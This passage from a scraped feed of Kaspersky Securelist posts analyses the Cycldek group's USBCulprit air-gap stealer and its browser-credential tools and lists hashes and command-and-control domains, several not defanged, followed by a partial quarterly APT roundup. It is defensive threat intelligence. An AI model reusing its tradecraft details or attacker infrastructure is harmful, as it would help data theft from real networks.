below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "modified": "2020-06-03T10:00:32", "published": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-29T10:36:40", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new.NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless 